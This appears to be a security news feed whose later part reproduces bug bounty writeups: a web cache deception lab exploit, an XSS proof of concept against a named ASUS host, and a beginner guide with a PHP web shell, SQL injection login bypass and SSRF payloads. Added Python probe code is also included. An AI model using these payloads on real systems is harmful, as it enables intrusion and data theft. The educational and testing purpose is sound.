In parallel, run a HackerOne Challenge to stress-test specific assets:

Targeted Testing: Focus on a particular asset or feature during a time-bound event.
Security Maturity Assessment: Evaluate the security readiness of assets before wider testing.
Cost Reduction: Identify and fix vulnerabilities pre-deployment, reducing overall bounty payments.
Build Familiarity: Develop rapport with a group of hackers and learn best practices for running a successful program.

Initiating a Private Ongoing Bug Bounty Program

Transition to a Private Bug Bounty Program for continuous coverage:

Ongoing Monitoring: Maintain regular security assessments of your assets.
Flexibility: Adapt the scope of testing based on evolving security needs.
Incentivized Testing: Engage a curated group of hackers to continuously probe for vulnerabilities.

Growing to a Public Bug Bounty Program

Finally, scale up to a Public Bug Bounty Program to maximize coverage:

Widest Coverage: Engage the global hacker community for the broadest possible testing.
Continuous Improvement: Benefit from ongoing insights and vulnerability reports.
Enhanced Reputation: Demonstrate a strong commitment to security by collaborating openly with ethical hackers.

HackerOne Is the Ultimate Solution to Dismantle FUD

By methodically leveraging HackerOne's products, organizations can systematically dismantle Fear, Uncertainty, and Doubt associated with ethical hacking. Embrace crowd-sourced testing, build internal support, and scale your security efforts to create a robust, proactive defense against cyber threats. Together, we can create a safer digital world. To learn more, contact the expert team at HackerOne today.

FUD can overshadow proactive collaboration with ethical hackers. Let's explore how to combat FUD and get organizational buy-in for bug bounty and VDP.

by HackerOne

Taiwan alleges that Chinese companies are illegally recruiting talent and stealing trade secrets.

by ITPro Today

Kaspersky Global Emergency Response Team (GERT) shares the most interesting IR cases for the year 2023: insider attacks, ToddyCat-like APT, Flax Typhoon and more.

by Securelist

The Navy is testing out the Elon Musk–owned satellite constellation to provide high-speed internet access to sailors at sea. It’s part of a bigger project that’s about more than just getting online.

by WIRED Security News

The company continues to incur expenses related to the attack, but does not expect a material impact. 

by Cybersecurity Dive

Nation-state attackers are exploiting vulnerabilities in products from Check Point Software, Palo Alto Networks and others to attack multiple industries.

by Cybersecurity Dive

This year’s Olympics and Paralympic games have been a showcase of the benefits of preparedness, tenacity, and adaptability in achieving success. Olympians require all of these traits, and more, to operate at the very top of their respective disciplines. However, the psychological impact of going for gold, and carrying the expectations of fans nationwide, can […] The post Simone Biles & Cyber Burnout: A Shared Path to Resilience appeared first on IT Security Guru.

by IT Security Guru

No matter your reason for transitioning from VMware, this comprehensive guide details the key migration processes and tools to consider when moving to an alternative platform.

by ITPro Today

An insider threat can feel a bit like the plot twist in a spy thriller. You know, the moment when the protagonist realises the enemy is not just at the gates but has been inside the house the whole time. Suddenly, all those polite conversations by the water cooler take on a sinister meaning. So, […] The post INSIDER THREAT AWARENESS MONTH: Are you prepared? appeared first on IT Security Guru.

by IT Security Guru

The rise of AI presents both extraordinary opportunities and intimidating challenges in cybersecurity. While AI can easily identify and exploit vulnerabilities, deploying it without robust security measures introduces significant risks. As the technology evolves, many organisations prioritise AI innovation at the expense of security, leaving their systems vulnerable. This underscores the need for established security […] The post The six most dangerous new threats security teams need to know about appeared first on IT Security Guru.

by IT Security Guru

Eight vulnerabilities have been uncovered in Microsoft applications for macOS that an adversary could exploit to gain elevated privileges or access sensitive data by circumventing the operating system's permissions-based model, which revolves around the Transparency, Consent, and Control (TCC) framework. "If successful, the adversary could gain any privileges already granted to the affected

by The Hacker News

This report presents statistics on PC threats for Q2 2024, including data on ransomware, miners, threats to macOS and IoT devices.

by Securelist

The report gives statistics on mobile malware and unwanted software for Q2 2024, including mobile banking Trojans and ransomware.

by Securelist

2024-09-03 08:00:08

IT threat evolution Q2 2024

In this report, Kaspersky researchers explore the most significant attacks of Q2 2024 that used a XZ backdoor, the LockBit builder, ShrinkLocker ransomware, etc.

by Securelist

A 57-year-old man from the U.S. state of Missouri has been arrested in connection with a failed data extortion campaign that targeted his former employer. Daniel Rhyne of Kansas City, Missouri, has been charged with one count of extortion in relation to a threat to cause damage to a protected computer, one count of intentional damage to a protected computer, and one count of wire fraud. He was

by The Hacker News

On August 13, 2024, Microsoft disclosed a critical vulnerability, CVE-2024-38063, as part of its Patch Tuesday updates [1], [2]. This vulnerability affects the TCP/IP protocol, a fundamental communication protocol used for connecting devices on the Internet and enabling services like the World Wide Web and email. With a CVSS score of 9.8 (Critical), this vulnerability is considered critical because it can be exploited remotely and has the potential to be "wormable," meaning it could spread across networks without requiring user interaction. CVE-2024-38063 specifically allows attackers to execute arbitrary code remotely (RCE) on systems that have IPv6 enabled, which is the default setting on affected systems. This vulnerability impacts a wide range of Windows operating systems, including Windows 10, Windows 11, and Windows Server versions from 2008 through 2022. Organizations are strongly advised to update their systems immediately to prevent the risk of exploitation.

by Picus Security

by ComputerWeekly

1 Introduction. Web browsers are common targets for many different APTs. Tools like RedLine malware or penetration-testing tools such as SharpChrome or SharpChromium steal sensitive data like cookies and saved login…

by TrustedSec

On September 3, 2024, the White House published a report on Internet routing security. We’ll talk about what that means and how you can help.

by Cloudflare

We are excited to announce the release of Goffloader, a pure Go implementation of an in-memory COFFLoader and PE loader. This tool is designed to facilitate the easy execution of Cobalt Strike BOFs and unmanaged PE files directly in memory without writing any files to disk. Goffloader aims to take functionality that is conventionally within […] The post Introducing Goffloader: A Pure Go Implementation of an In-Memory COFFLoader and PE Loader appeared first on Praetorian.

by Praetorian

Realistic workforce exercises are key to implementing predictive defensive operations, raising the cost for adversaries to target and exploit vital infrastructure.

by Hack The Box Blog

Explore industry moves and significant changes in the industry for the week of September 2, 2024. Stay updated with the latest industry trends and shifts.

by SecurityWeek

Threat actors linked to the RansomHub ransomware group encrypted and exfiltrated data from at least 210 victims since its inception in February 2024, the U.S. government said. The victims span various sectors, including water and wastewater, information technology, government services and facilities, healthcare and public health, emergency services, food and agriculture, financial services,

by The Hacker News

Three men in the United Kingdom have pleaded guilty to operating otp[.]agency, a once popular online service that helped attackers intercept the one-time passcodes (OTPs) that many websites require as a second authentication factor in addition to passwords. Launched in November 2019, OTP Agency was a service for intercepting one-time passwords needed to log in to various websites. Scammers would enter the target’s phone number and name, and the service would initiate an automated phone call to the target that alerts them about unauthorized activity on their account.

by Krebs on Security

Broadcom is refocusing VMware as a private cloud technology, updating the company's core platforms for application delivery.

by ITPro Today

Atomic Stealer is the most popular malware-as-a-service on macOS because of highly active affiliate-driven distribution campaigns and constant feature upgrades.

by ThreatDown

The world of cybersecurity is in a constant state of flux. New vulnerabilities emerge daily, and attackers are becoming more sophisticated. In this high-stakes game, security leaders need every advantage they can get. That's where Artificial Intelligence (AI) comes in. AI isn't just a buzzword; it's a game-changer for vulnerability management. AI is poised to revolutionize vulnerability

by The Hacker News

3 Bad Habits Holding You Back from Financial Freedom, Best Things at DEF CON 32, and more...

by Hive Five

Even before Delta came forward, shareholders were looking for their pound of flesh, filing a class action lawsuit against CrowdStrike. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Today’s blog installment brings us to the end of our 30-week journey that covered 30 cybersecurity topics that I felt would be of interest to a wide variety of security practitioners, such as Security Architects, Security Admins, and Security Auditors. I hope everyone found it as helpful as I found it to write.

by SpiderLabs Blog

When you set up a new Windows PC, you can choose from up to four types of user accounts - but your first choice might not be the right one.

by ZDNET Security

The FBI and CISA Issue Joint Advisory on New Threats and How to Stop Ransomware Note: on August 29, the FBI and CISA issued a joint advisory as part of their ongoing #StopRansomware effort to help organizations protect against ransomware. The latest advisory, AA24-242A, describes a new cybercriminal group and its attack methods. It also details three important actions to take today to mitigate

by The Hacker News

Have you ever noticed that even the most impactful breaches often start with something as simple as a regular user being targeted through a phishing email or a weak password? From there, attackers methodically follow an attack path by dumping credentials, moving laterally across the network, escalating privileges, and eventually gaining domain administrator access. In other words, rather than relying on an extremely sophisticated single-shot technique, these attacks unfold like a domino effect, where each step paves the way for the next, leading to a full-scale compromise. This is precisely the kind of attack chain that Picus Attack Path Validation (APV), a cutting-edge automated penetration testing software, is designed to expose and validate, ensuring that these security vulnerabilities are identified before they can be exploited.

by Picus Security

For the latest discoveries in cyber research for the week of 26th August, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES: California-based Patelco Credit Union has confirmed a data breach after a ransomware attack resulted in the exposure of sensitive personal information belonging to 726K clients and employees. The compromised data includes names, […] The post 2nd September – Threat Intelligence Report appeared first on Check Point Research.

by Check Point Research

Unit 42 discusses WikiLoader malware spoofing GlobalProtect VPN, detailing evasion techniques, malicious URLs, and mitigation strategies. The post Spoofed GlobalProtect Used to Deliver Unique WikiLoader Variant appeared first on Unit 42.

by Palo Alto Networks - Unit42

Analysis of the hacktivist group Head Mare targeting companies in Russia and Belarus: exploitation of WinRAR vulnerability, custom tools PhantomDL and PhantomCore.

by Securelist

Even in 2024, the world is rife with digital paranoia and superstition. Find out if your smartphone really is spying on you, and why incognito mode doesn’t make you invisible.

by Kaspersky

Roblox developers are the target of a persistent campaign that seeks to compromise systems through bogus npm packages, once again underscoring how threat actors continue to exploit the trust in the open-source ecosystem to deliver malware. "By mimicking the popular 'noblox.js' library, attackers have published dozens of packages designed to steal sensitive data and compromise systems," Checkmarx

by The Hacker News

The evolving world of work can make it hard for young professionals in their first jobs. Here are expert tips to help you succeed.

by ITPro Today

Leveraging the unique skills of neurodiverse individuals can help fill critical talent gaps in the workforce, particularly in IT, by fostering inclusive workplaces that recognize and support diverse cognitive abilities.

by ITPro Today

A list of topics we covered in the week of August 26 to September 1 of 2024

by Malwarebytes Labs

by ComputerWeekly

Successful ransomware attacks against organizations in Asia continue at peak levels in 2024 following a wave of high-profile data breaches last year.

by Dark Reading

APPRENTICE LAB

Before starting, configure FoxyProxy to route browser traffic through Burp Suite. Ensure that 'Intercept' is turned off in Burp Suite while FoxyProxy is active, so that all requests are logged in the HTTP history. Then log in to the application using the credentials wiener:peter. Note that the response will include your API key.

1. Go to Burp Suite Proxy > HTTP history, right-click the GET /my-account request and select Send to Repeater.

2. In the Repeater tab, modify the path by adding an arbitrary segment, for example /my-account/hanzala. Send the request and observe that you still receive a 200 response containing your API key. This shows that the origin server ignores the extra segment and maps the request back to /my-account. Also verify that this response is not served from the cache.

3. Add a static file extension to the path, such as /my-account/hanzala.js, and send the request. Look at the response headers:
   - X-Cache: miss. The response was not served from the cache.
   - Cache-Control: max-age=30. If the response is cached, it is stored for 30 seconds.

4. Resend the request within 30 seconds. The X-Cache header changes to hit, so the response was served from the cache. The cache applies a caching rule to the .js extension even though the origin treated the request as /my-account; that mismatch between how the cache and the origin interpret the path is the web cache deception.

Now that we know the response is cached, let's build the exploit.

5. In the browser, click Go to exploit server. In the Body section, craft an exploit that navigates the victim user carlos to the URL you crafted earlier. Change the arbitrary path segment so the victim does not receive your own previously cached response:

<script>document.location="https://YOUR-LAB-ID.web-security-academy.net/my-account/hanzalaa.js"</script>

6. Click Deliver exploit to victim. When the victim views the exploit, the response they receive, which contains their API key, is stored in the cache.

7. In Burp Suite, change the path to /my-account/hanzalaa.js and send the request within the 30-second cache window. Since carlos's response is stored in the cache, this request returns the same response. Copy carlos's API key.

8. Click Submit solution and submit carlos's API key to solve the lab.

We are done. Great job everyone! 👏

Writeup: Path mapping for web cache deception @ PortSwigger Academy was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups
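The two checks the writeup performs by hand in Repeater (does the origin ignore a trailing path segment, and does the cache store a response once the path ends in a static extension?) can be scripted. The following is an added example, not code from the writeup or from PortSwigger: it takes any `send(path)` callable that performs an authenticated GET and returns `(status, headers, body)`, and decides whether the path-mapping discrepancy is exploitable. Because no real target is available here, it ships with a constructed `SimulatedTarget` that models a cache with a rule on static extensions in front of an origin that may or may not ignore extra segments; the `/my-account` path, the `X-Cache` and `Cache-Control` headers and the 30-second TTL are the lab's, everything else is assumed.

```python
import re
import secrets
import time
from typing import Callable, Dict, Tuple

# A response is (status, headers, body); a Sender performs one GET for a path.
Response = Tuple[int, Dict[str, str], str]
Sender = Callable[[str], Response]


def probe_path_mapping_deception(send: Sender, base_path: str, static_ext: str = ".js") -> dict:
    """Reproduce the writeup's two checks against an authenticated session.

    1. Append an arbitrary segment to base_path. If the origin still answers 200
       with the same body, it maps /base/<anything> back to /base.
    2. Append a static-looking extension to that segment and request it twice.
       A miss followed by a hit means the cache keys on the extension, so a
       victim's private response can be parked under an attacker-chosen URL.
    """
    canary = secrets.token_hex(4)  # fresh segment so we never read a stale entry
    st0, _, body0 = send(base_path)
    st1, _, body1 = send(f"{base_path}/{canary}")
    origin_maps_path = st0 == 200 and st1 == 200 and body0 == body1

    poisoned_path = f"{base_path}/{canary}{static_ext}"
    st2, hdr_first, body2 = send(poisoned_path)
    _, hdr_second, _ = send(poisoned_path)  # must be within Cache-Control max-age
    cache_stores_extension = (
        st2 == 200
        and hdr_first.get("X-Cache", "").lower() == "miss"
        and hdr_second.get("X-Cache", "").lower() == "hit"
    )

    return {
        "origin_maps_path": origin_maps_path,
        "cache_stores_extension": cache_stores_extension,
        # Only dangerous when the cached body is the private /my-account content.
        "vulnerable": origin_maps_path and cache_stores_extension and body2 == body0,
        "poisoned_path": poisoned_path,
    }


class SimulatedTarget:
    """Constructed stand-in for the lab (not a real server): a cache with a
    rule for static extensions in front of an origin that serves /my-account
    and, when ignore_extra_segments is True, ignores anything after it."""

    STATIC = re.compile(r"\.(js|css|png|jpg)$")

    def __init__(self, ignore_extra_segments: bool, ttl: int = 30):
        self.ignore_extra_segments = ignore_extra_segments
        self.ttl = ttl
        self.cache: Dict[str, Tuple[float, int, str]] = {}  # path -> (expiry, status, body)

    def origin(self, path: str) -> Tuple[int, str]:
        if path == "/my-account" or (
            self.ignore_extra_segments and path.startswith("/my-account/")
        ):
            return 200, "apikey=CONSTRUCTED-KEY-FOR-WIENER"  # private, per-session body
        return 404, "not found"

    def send(self, path: str) -> Response:
        now = time.monotonic()
        entry = self.cache.get(path)
        if entry and entry[0] > now:
            return entry[1], {"X-Cache": "hit", "Cache-Control": f"max-age={self.ttl}"}, entry[2]
        status, body = self.origin(path)
        headers: Dict[str, str] = {}
        if self.STATIC.search(path):  # the cache rule: static extension => cacheable
            headers = {"X-Cache": "miss", "Cache-Control": f"max-age={self.ttl}"}
            self.cache[path] = (now + self.ttl, status, body)
        return status, headers, body


if __name__ == "__main__":
    for flag in (True, False):
        print(flag, probe_path_mapping_deception(SimulatedTarget(flag).send, "/my-account"))
```

Against a real target, `send` would be a `requests.Session` GET carrying the tester's own session cookie; the probe never touches another user's data, it only establishes that the attacker-chosen path would be cached. The origin that returns 404 for the extra segment is the fixed behaviour: with no path-mapping discrepancy there is nothing private to cache.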

A few months ago, during a routine security assessment, I uncovered a significant cross-site scripting (XSS) vulnerability in the Laravel Ignition debugging tool exposed on an ASUS host. This reflected XSS (R-XSS) posed a high risk due to the potential for unauthorized script execution in users' browsers. Here's how I discovered and explored this vulnerability.

The Discovery

While examining the target, I noticed that Laravel Ignition debug mode was enabled on adam.asus.com, and the /_ignition/scripts/ endpoint was vulnerable to XSS. The vulnerability was exposed through the following URL:

Vulnerable URL: http://adam.asus.com/_ignition/scripts/--%3E%3Csvg%20onload=alert('cappriciosec.com')%3E

URL-decoded, the path segment is --><svg onload=alert('cappriciosec.com')>: it is built to close an HTML comment and inject an SVG element whose onload handler runs. When accessing this URL, the embedded script was executed in the user's browser, confirming the presence of an XSS vulnerability.

Understanding the Vulnerability

Bug Name: R-XSS
Bug Priority: High
Vulnerable URL: http://adam.asus.com/_ignition/scripts/--%3E%3Csvg%20onload=alert('cappriciosec.com')%3E

Impact

The impact of this XSS vulnerability depends on the application's context and the privileges of the compromised user. For example:

- Minimal Impact: In applications with public information, the impact might be negligible.
- Serious Impact: In applications handling sensitive data, such as financial transactions or healthcare records, the impact could be severe, allowing unauthorized access to private information.
- Critical Impact: If a user with elevated privileges is compromised, the attacker could gain full control of the application, affecting all users and data.

Steps to Reproduce

To confirm the vulnerability, follow these steps:

1. Access the vulnerable URL: open http://adam.asus.com/_ignition/scripts/--%3E%3Csvg%20onload=alert('cappriciosec.com')%3E in your browser.
2. Observe the script execution: the script executes in your browser, displaying an alert with the text cappriciosec.com.

Automating the Hunt

To streamline the process, I built a Python tool specifically for detecting this vulnerability. You can install it using pip and automate your testing:

Tool/PoC: laravel-ignition-rxss on GitHub

pip install laravel-ignition-rxss
laravel-ignition-rxss --chatid <YourTelegramChatID>

To check a single URL:
laravel-ignition-rxss -u http://mytargetprogram.com

To check a list of URLs:
laravel-ignition-rxss -i urls.txt

Remediation

To mitigate this vulnerability, disable debug mode by setting APP_DEBUG to false in the environment configuration (.env) so that Ignition's debug pages are not served to users; debug tooling should never be reachable in production. This prevents the reflected script execution and protects users from XSS attacks via this endpoint.

POC by: @karthithehacker
Mail: contact@karthithehacker.com
Website: https://www.karthithehacker.com/

If you're interested in our VAPT service, contact us at ceo@cappriciosec.com or contact@cappriciosec.com. For enrolling in my cybersecurity and bug bounty course, WhatsApp +91 82709 13635.

Connect with me:
Twitter: https://twitter.com/karthithehacker
Instagram: https://www.instagram.com/karthithehacker/
LinkedIn: https://www.linkedin.com/in/karthikeyan--v/
Website: https://www.karthithehacker.com/
Github: https://github.com/karthi-the-hacker/
npmjs: https://www.npmjs.com/~karthithehacker
Youtube: https://www.youtube.com/@karthi_the_hacker

Thank you,
Karthikeyan.V

A Story About How I Found XSS in ASUS was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups
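The writeup's payload works only if the `/_ignition/scripts/<name>` route echoes the requested name back into HTML unencoded. A scanner that just fires `alert()` at a URL cannot tell that apart from an endpoint that reflects the input but HTML-encodes it, so the check below classifies the reflection instead. This is an added example, not the author's laravel-ignition-rxss tool nor Ignition's own code: it sends a unique token followed by the breakout characters the original payload relies on (`--><"'`), then reports whether the response contains them raw, only in HTML-escaped form, with the token but the breakout characters stripped, or not at all. The three `*_fetch` functions are constructed stand-ins for a vulnerable install, the same page with output encoding, and a production install with APP_DEBUG=false; the route path is the one from the writeup, the response markup is assumed.

```python
import html
import secrets
import urllib.parse
from typing import Callable

# Characters that must survive unencoded for the writeup's payload
# (--><svg onload=...>) to break out of its context and inject markup.
BREAKOUT = "--><\"'"


def make_marker() -> str:
    """Unique token plus the breakout characters, so a match in the body can
    only come from our own input, never from legitimate page content."""
    return f"zq{secrets.token_hex(3)}{BREAKOUT}"


def probe_path(base_url: str, marker: str) -> str:
    """The /_ignition/scripts/<name> route from the writeup, with the marker
    percent-encoded as the original payload was."""
    return f"{base_url.rstrip('/')}/_ignition/scripts/{urllib.parse.quote(marker, safe='')}"


def classify_reflection(marker: str, body: str) -> str:
    """raw: marker echoed verbatim (exploitable); escaped: only the
    HTML-encoded form is present; filtered: token present but breakout
    characters removed; absent: not reflected at all."""
    token = marker[: len(marker) - len(BREAKOUT)]
    if marker in body:
        return "raw"
    if html.escape(marker, quote=True) in body:
        return "escaped"
    if token in body:
        return "filtered"
    return "absent"


def check(base_url: str, fetch: Callable[[str], str]) -> str:
    """fetch(url) -> response body (e.g. requests.get(url).text); returns the classification."""
    marker = make_marker()
    return classify_reflection(marker, fetch(probe_path(base_url, marker)))


# Constructed responses standing in for a real Ignition install (assumed markup).
def _script_name(url: str) -> str:
    return urllib.parse.unquote(url.rsplit("/_ignition/scripts/", 1)[1])


def vulnerable_fetch(url: str) -> str:
    # Echoes the requested script name into an HTML comment unencoded,
    # which is the context the "-->" prefix of the payload is built to close.
    return f"<!-- script {_script_name(url)} --><p>Not found</p>"


def hardened_fetch(url: str) -> str:
    # Same page with output encoding applied to the reflected value.
    return f"<!-- script {html.escape(_script_name(url), quote=True)} --><p>Not found</p>"


def production_fetch(url: str) -> str:
    # APP_DEBUG=false: no debug route, a generic error page, nothing reflected.
    return "<p>404 Not Found</p>"


if __name__ == "__main__":
    for name, fetch in (("vulnerable", vulnerable_fetch), ("hardened", hardened_fetch),
                        ("production", production_fetch)):
        print(name, check("http://example.test", fetch))
```

Only a "raw" result is reportable; "escaped" means the developer encoded output and the alert will never fire, while "filtered" is worth a closer manual look but is not a finding on its own.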

Passwd is a file where information related to the user is stored such as name, user id, group id,gecos field, home directory, and command…Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

Understanding the Dark Web: Myths vs. RealityContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

Update on meContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

Problem:Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

IntroductionWelcome to the thrilling world of bug bounty hunting — where finding glitches in software is not just a hobby but a gateway to potential riches and recognition! Imagine being a digital detective, solving mysteries that most folks wouldn’t even notice, and getting rewarded for it. In this guide, we’ll unravel the basics of bug bounty hunting, give you a step-by-step walkthrough of unearthing common vulnerabilities, and share some nifty resources to get you started. Buckle up, it’s going to be a bug-tastic ride!What is Bug Bounty Hunting?Bug bounty hunting is like being a superhero in the realm of cybersecurity, but without the flashy suit. It involves sniffing out and reporting security vulnerabilities in systems, apps, or websites. Companies run bug bounty programs to lure ethical hackers (like you) into spotting and reporting these weak spots, which helps them beef up their security. In return, you get rewards, recognition, or at least a virtual high-five from the tech community.Step 1: Learn the Basics of Web SecurityBefore you start hunting bugs, you need to get comfy with the basics of web security. Think of it as learning the ABCs of cyber sleuthing.HTTP & HTTPS: These are like the postal services of the web. HTTP is the standard protocol, while HTTPS is its secure cousin that encrypts data between the browser and the server. Always go for HTTPS — it’s like wearing a seatbelt on the web.OWASP Top 10: This is your cheat sheet to the top 10 web security risks. 
Familiarize yourself with these troublemakers:SQL Injection (SQLi): When hackers play with your database like it’s a toy.Cross-Site Scripting (XSS): When bad scripts crash the party on your website.Broken Authentication: When your login system is as secure as a paper lock.Sensitive Data Exposure: When your private info goes public like it’s on a billboard.XML External Entities (XXE): When your XML files are sneaky troublemakers.Broken Access Control: When users access more than they should, like breaking into the VIP section.Security Misconfiguration: When your security settings are as mixed up as a puzzle.Cross-Site Request Forgery (CSRF): When attackers make your site do things it shouldn’t.Insecure Deserialization: When data being processed gets all messed up.Using Components with Known Vulnerabilities: When using outdated parts is like bringing a leaky bucket to the party.Networking Basics: Learn how IP addresses, DNS, and data travel over networks. It’s like understanding how letters get to your mailbox, but with a lot more technical mumbo jumbo.Step 2: Get Familiar with Tools of the TradeEvery superhero needs their gadgets, and for bug bounty hunting, you’ve got some cool tools:Burp Suite: Think of it as your magnifying glass for HTTP requests and responses. It’s powerful and comes in a community edition if you’re just starting out. Check out the Burp Suite Community Edition and Burp Suite Tutorial for Beginners.Nmap: Your go-to tool for scanning networks and discovering open ports. It’s like your radar for finding weak spots. Explore the Nmap Official Site and Nmap Tutorial for Beginners.OWASP ZAP: An open-source security scanner that helps you spot vulnerabilities. It’s like having a sidekick that never sleeps. Check out the OWASP ZAP Official Site and the OWASP ZAP User Guide.Google Dorking: Use advanced search operators to dig up information exposed on the internet. It’s like using a super-powered search engine to find hidden gems. 
Read up on Google Dorking Guide.Step 3: Choose a Bug Bounty PlatformNow, where do you actually hunt these bugs? Here are some platforms where you can get started:HackerOne: The big leagues with programs from major companies. Check out HackerOne and their Beginner’s Guide.Bugcrowd: Another top platform with various programs to explore. Visit Bugcrowd and Bugcrowd University.Synack: A more exclusive platform with an application process. Head over to Synack if you’re feeling fancy.Open Bug Bounty: Focuses on responsible disclosure even if you don’t have a formal program. Check out Open Bug Bounty.Step 4: Finding Vulnerabilities — Step-by-Step ExamplesLet’s put on our detective hats and dive into some classic vulnerabilities:Example 1: Cross-Site Scripting (XSS)XSS is like a prankster who injects malicious scripts into web pages. Here’s how to catch them:Identify Input Fields: Look for places where you can type stuff — search boxes, comment sections, or profiles.Inject Test Script: Drop a simple script like:<script>alert(''XSS'')</script>into the input field and hit submit.Check for Execution: If you see an alert box popping up, you’ve found an XSS vulnerability. Congrats!Report the Vulnerability: Describe your findings in a report — explain how you did it, the impact, and offer suggestions for fixing it. It’s like writing a detective’s report.Example: Testing a search fieldEnter <script>alert(''Test'')</script> in the search box.If an alert box appears, it’s an XSS vulnerability.Example 2: Remote Code Execution (RCE)RCE is when hackers can run commands on a server from afar. Here’s how to find it:Find User Input: Look for places where users can upload files or enter commands.Test File Uploads: Upload a file with an extension for executable code, like .php or .asp. Try this payload:<?php system($_GET[''cmd'']); ?>Execute Command: Access the uploaded file via the web and pass a command using URL parameters. 
For example: http://example.com/uploads/yourfile.php?cmd=lsObserve Output: If the command runs and you see the output, the server is vulnerable to RCE.Report the Vulnerability: Detail how you uploaded the file, executed the command, and the potential impacts.Example: Upload a PHP fileUpload a file named shell.php with the content <?php phpinfo(); ?>.Access it via http://example.com/uploads/shell.php to see if it executes.Example 3: Server-Side Request Forgery (SSRF)SSRF is when an attacker tricks the server into making requests to internal resources. Here’s how to sniff it out:Identify URL Parameters: Look for parameters that accept URLs or IP addresses.Inject Malicious URL: Test with URLs pointing to internal resources, like:http://localhost/admin http://127.0.0.1Observe Response: Check if the server returns data from the internal URL.Report the Vulnerability: Explain how you injected the URL, the responses you observed, and potential impacts.Example: Manipulate a URL parameterChange a parameter like http://example.com/fetch?url=http://localhost to other internal addresses.Example 4: SQL Injection (SQLi)SQL Injection (SQLi) involves injecting malicious SQL queries into an application to manipulate the database. Here’s how to test for SQLi:Identify Input Fields: Find fields where you can input data that interacts with a database, such as login forms or search bars.Inject SQL Payload: Use SQL injection payloads to test the input fields. For example:'' OR ''1''=''1Observe Response: If the application returns unexpected results or database errors, it may be vulnerable to SQLi.Report the Vulnerability: Provide details of the injection, the responses, and potential impacts.Example: Testing a login form:Enter admin'' OR ''1''=''1 as the username and password. 
If it logs you in, the site is vulnerable.Step 5: Learn From the CommunityEngaging with the bug bounty community can enhance your skills and knowledge:Write-Ups: Reading write-ups from experienced hunters can provide insights into different techniques and approaches. Websites like Hack The Box Write-Ups offer valuable information.Forums and Discord Channels: Join forums and Discord channels for bug bounty hunters. These platforms are great for asking questions and sharing knowledge.Bugcrowd ForumHackerOne CommunityBlogs and Videos: Follow cybersecurity blogs and YouTube channels for updates and tutorials.Security WeeklyThe Bug Bounty HubLiveOverflow’s YouTube ChannelAdditional Tips for Bug Bounty HuntingUnderstand the Scope: Each bug bounty program has a defined scope that specifies which applications, domains, or functionalities are in scope for testing. Always read and follow the program’s rules to avoid testing unauthorized areas.HackerOne Scope Policy2. Stay Updated: The cybersecurity landscape is always evolving. Keep up with the latest vulnerabilities, tools, and techniques by following industry news and updates.CVE DetailsExploit Database3. Practice Ethically: Always use your skills responsibly. Respect the rules of each bug bounty program and avoid causing harm to systems or users.4. Document Everything: Keep detailed records of your findings, including the steps to reproduce the vulnerability, the impact, and any mitigation advice. This will help you write better reports and communicate effectively with program managers.5. Use Automation Wisely: While automated tools can help identify vulnerabilities, manual testing is crucial for discovering complex issues. 
Use automation as a supplement, not a replacement for manual analysis.

Example Scenarios: Bug Bounty Hunting in Action

Scenario 1: Finding XSS on a Search Page

Step-by-Step Example:
1. Navigate to the Search Page: Open the search page of the target application.
2. Test Input Fields: In the search box, input <script>alert('XSS')</script>.
3. Submit and Observe: Click the search button and observe whether an alert box pops up.
4. Verify and Report: If the script executes, it indicates an XSS vulnerability. Write a report detailing the affected URL, the payload used, and the impact.

Scenario 2: Exploiting RCE via File Upload

Step-by-Step Example:
1. Locate File Upload Functionality: Find a section of the application that allows file uploads, such as an avatar or document upload feature.
2. Prepare Malicious File: Create a PHP file with the following content: <?php system($_GET['cmd']); ?>
3. Upload the File: Upload the PHP file to the server.
4. Access the File: Visit the file via URL, e.g., http://example.com/uploads/malicious.php?cmd=ls, to execute a command.
5. Verify Execution: If you see the output of the command, the server is vulnerable to RCE. Report the issue with details on the file upload process and the commands executed.

Scenario 3: Exploiting SSRF via URL Parameter

Step-by-Step Example:
1. Find URL Parameter: Look for a URL parameter in the application that accepts user input, such as a URL fetching feature.
2. Inject Internal URLs: Enter URLs like http://localhost/admin or http://127.0.0.1 in the parameter.
3. Check Responses: Observe whether the application returns information from the internal URL or service.
4. Report the Vulnerability: Document the URL parameter, the injected payloads, and the responses.

Scenario 4: SQL Injection in Login Form

Step-by-Step Example:
1. Locate Login Form: Find the login form on the target website.
2. Inject SQL Payload: Enter admin' OR '1'='1 as both username and password.
3. Submit the Form: Click login and see if you gain unauthorized access.
4. Document and Report: If successful, report the SQL injection with details on the payload and its effect.

Links and Resources

Learning Platforms and Tutorials
Hacker101 — Free Online Security Training
PortSwigger Web Security Academy — Learn Web Security for Free
Bugcrowd University — Free Bug Bounty Training
OWASP (Open Web Application Security Project) — OWASP Resources

Practice Platforms
Hack The Box — Practice Cybersecurity
TryHackMe — Learn Cybersecurity
VulnHub — Vulnerable By Design
CTFtime — Capture The Flag Events

Bug Bounty Programs and Platforms
HackerOne — Bug Bounty Platform
Bugcrowd — Find and Report Bugs
Synack — Managed Bug Bounty
Cobalt — Pentesting as a Service

Tools and Resources
Burp Suite — Web Vulnerability Scanner
OWASP ZAP (Zed Attack Proxy) — Free Security Scanner
Nmap — Network Scanner
Nikto — Web Server Scanner

Learning and Community
The Hacker News — Stay Updated on Security News
Krebs on Security — Krebs on Security Blog
Reddit — NetSec Subreddit
Twitter — List of Security Experts on Twitter

Documentation and Reporting
Exploit-DB — Exploit Database: Exploits and Vulnerabilities
CVE Details — Vulnerability Database
Security Focus — Vulnerability Database

Conclusion

Bug bounty hunting is like a fun treasure hunt for finding security flaws on the web. It's exciting and can be super rewarding if you play by the rules, keep good notes, and use your tools wisely. Imagine yourself as a superhero saving the day, but instead of a cape, you've got a keyboard. Keep your adventures ethical, document your discoveries like a treasure map, and use automation as your trusty sidekick, not your only tool. Happy hunting, and may you find bugs that are as elusive as a needle in a haystack! 🚀💻🔍

For further learning and practice:
Bug Bounty Tutorials: Hacker101
CTF Platforms: Hack The Box, TryHackMe
Cybersecurity Blogs: The Hacker News, Krebs on Security

Happy hunting, and may your bug bounty journey be both rewarding and educational! Thank you for reading! 🚀💻🔍

— Subham

